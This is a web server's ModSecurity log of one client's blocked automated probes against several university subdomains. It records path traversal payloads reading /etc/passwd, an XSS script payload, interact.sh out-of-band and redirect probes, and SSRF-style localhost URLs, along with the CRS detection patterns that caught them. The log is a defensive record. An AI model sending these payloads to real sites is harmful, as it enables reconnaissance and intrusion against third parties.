[Tue Aug 29 11:56:42.987123 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqeFsgAAAAx"]
[Tue Aug 29 11:56:43.528654 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAArHa5wAAAAJ"]
[Tue Aug 29 11:56:43.536125 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16i8Co-f0AAAq5@UUAAAAK"]
[Tue Aug 29 11:56:43.576118 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAqeFssAAAAx"]
[Tue Aug 29 11:56:43.577407 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAolK4cAAAAe"]
[Tue Aug 29 11:56:43.655268 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqeFs0AAAAx"]
[Tue Aug 29 11:56:43.715294 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAocynQAAAAR"]
[Tue Aug 29 11:56:43.717038 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAq-HfUAAAAT"]
[Tue Aug 29 11:56:43.721489 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqeFtAAAAAx"]
[Tue Aug 29 11:56:43.732394 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAArB14kAAAAV"]
[Tue Aug 29 11:56:43.742816 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAolK40AAAAe"]
[Tue Aug 29 11:56:43.744655 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArIAYMAAAAX"]
[Tue Aug 29 11:56:44.548601 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16jMCo-f0AAAqw54UAAAAH"]
[Tue Aug 29 11:56:44.559451 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAocyncAAAAR"]
[Tue Aug 29 11:56:44.560425 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArB14sAAAAV"]
[Tue Aug 29 11:56:44.631263 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAolK5AAAAAe"]
[Tue Aug 29 11:56:44.634792 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAApbUykAAAAh"]
[Tue Aug 29 11:56:44.655275 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16jMCo-f0AAArIAYYAAAAX"]
[Tue Aug 29 11:56:44.676618 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArIAYcAAAAX"]
[Tue Aug 29 11:56:45.537515 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:707056/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq-HfsAAAAT"]
[Tue Aug 29 11:56:45.546210 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:380660/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAoz8NsAAAAS"]
[Tue Aug 29 11:56:45.571493 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:265536/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq-HfwAAAAT"]
[Tue Aug 29 11:56:45.574926 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:053931/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAArZP0MAAAAC"]
[Tue Aug 29 11:56:45.681549 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:970630/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAoz8N8AAAAS"]
[Tue Aug 29 11:56:45.695801 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jcCo-f0AAAq-Hf8AAAAT"]
[Tue Aug 29 11:56:46.562308 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:394773/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAApbUy4AAAAh"]
[Tue Aug 29 11:56:46.562527 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:621066/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAq5@VUAAAAK"]
[Tue Aug 29 11:56:46.625900 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAApbUzAAAAAh"]
[Tue Aug 29 11:56:46.647907 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArZP0wAAAAC"]
[Tue Aug 29 11:56:46.668944 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:367691/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAArZP00AAAAC"]
[Tue Aug 29 11:56:46.711760 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:553262/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAolK50AAAAe"]
[Tue Aug 29 11:56:46.786719 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAq5@V0AAAAK"]
[Tue Aug 29 11:56:46.796875 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArIAZIAAAAX"]
